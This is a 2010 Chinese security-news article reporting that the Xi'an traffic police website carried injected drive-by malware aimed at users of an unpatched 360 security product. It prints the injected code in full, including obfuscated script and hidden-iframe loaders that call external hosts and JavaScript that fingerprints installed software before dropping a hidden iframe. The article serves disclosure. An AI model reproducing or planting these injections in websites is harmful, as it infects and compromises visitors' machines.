西安市公安局交警支队网站长期被挂马

来源:岁月联盟 编辑:猪猪 时间:2010-04-19

西安市公安局交通警察支队网站长期被挂马

[作者:猪猪]

[信箱:100298@qq.com]

[版权所有:岁月联盟 www.syue.com]

大家都知道,自己的座驾查看是否违章,可以登录交警的网站查询,虽然网站更新的速度不理想不过还是有处可查。

可是交警的网站长期被挂木马病毒,你还敢去吗?

黑客是利用 360安全卫士 的漏洞进行挂马,如果安装360安全卫士的朋友没有及时更新版本,那么就完蛋了。

下面我们来看看西安某交警网站的截图:

挂马代码:

<script src=http://c.%76cm%61%72%74.%63%6F%6D.%63n></script>

 挂马代码:

if(document.location.href.indexOf("gov")>=0)
{} else {document.write("<div style='display:none'>")
document.write(unescape('%3Ciframe%20src%3Dhttp%3A//%74%62%61%6F%37%2E%36%36%30%30%2E%6F%72%67:%39%37/%78%6F/%64%6B.html%20width=100%20height=0%3E%3C/iframe%3E'))
document.write("</div>")}

挂马地址:

<iframe src=http://tbao7.6600.org:97/xo/dk.html width=100 height=0></iframe>

挂马地址转换后:

http://c.vcmart.com.cn

木马分析代码:

<script type="text/javascript" src="http://js.tongji.linezing.com/1566155/tongji.js"></script><noscript><a href=" http://www.linezing.com"><img src="http://img.tongji.linezing.com/1566155/tongji.gif"/></a></noscript>
<script>
function setCookie(name, value, expire) {   
  window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}

function getCookie(Name) {   
   var search = Name + "=";
   if (window.document.cookie.length > 0) { // if there are any cookies
     offset = window.document.cookie.indexOf(search);
  if (offset != -1) { // if cookie exists
       offset += search.length;
// set index of beginning of value
    end = window.document.cookie.indexOf(";", offset)    
// set index of end of cookie value
    if (end == -1)
      end = window.document.cookie.length;
    return unescape(window.document.cookie.substring(offset, end));
     }
   }
   return null;
}
function register(name) {
  var today = new Date();
  var expires = new Date();
  expires.setTime(today.getTime() + 1000);
  setCookie("ItDoor", name, expires);
}

function openWin() {

  var c = getCookie("ItDoor");
  if (c != null) {
    return;
  }
  register("xiaolin");
  
  
 if(document.cookie.indexOf('hello')==-1)
 { 
        var expires=new Date();expires.setTime(expires.getTime()+1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString();
  knownImg = {}
  knownImg.resList = [
  {id: 'safe', res: 'res://c: Program%20Files360360Saferepairleakdll.dll/GIF/154'},
  {id: 'asafe', res: 'res://d: Program%20Files360360Saferepairleakdll.dll/GIF/154'},
  {id: 'bsafe', res: 'res://c: Program%20Files360Safelive.dll/#2/#203'},
  {id: 'csafe', res: 'res://d: Program%20Files360Safelive.dll/#2/#203'}
  ];

  knownImg.ok_resList = new Array();
  knownImg.tmp_resList = new Array();

  knownImg.checkSoft = function(){
   if (document.all){
    x = new Array();
    for (i = 0; i < knownImg.resList.length; i++){
     x[i] = new Image();
     x[i].src = "";
     knownImg.ok_resList.push(knownImg.resList[i].id);

     x[i].onload = function(){
     //alert(knownImg.resList[i].id + ': return true');
     }

     x[i].onerror = function(){
     //alert(knownImg.resList[i].id + ': return false');
     knownImg.ok_resList.pop();
     }

     x[i].src = knownImg.resList[i].res;
    }
   }
  }
  knownImg.checkSoft();


  if(knownImg.ok_resList.length>0){
  //alert(knownImg.ok_resList);
  //document.write('你:<br />'+knownImg.ok_resList.join('<br />'));
  }else{
   //alert('没');

  


   var NewWords;
   NewWords = unescape("<iframe src=0.htm width=100 height=0></iframe>");
   document.write(NewWords);
   
  }
 }

  
}
openWin();
</script>

上一篇:国内最大域名服务商新网被黑 服务中断8小时
下一篇:OWASP TOP 10 for 2010正式发布

最近更新

推荐浏览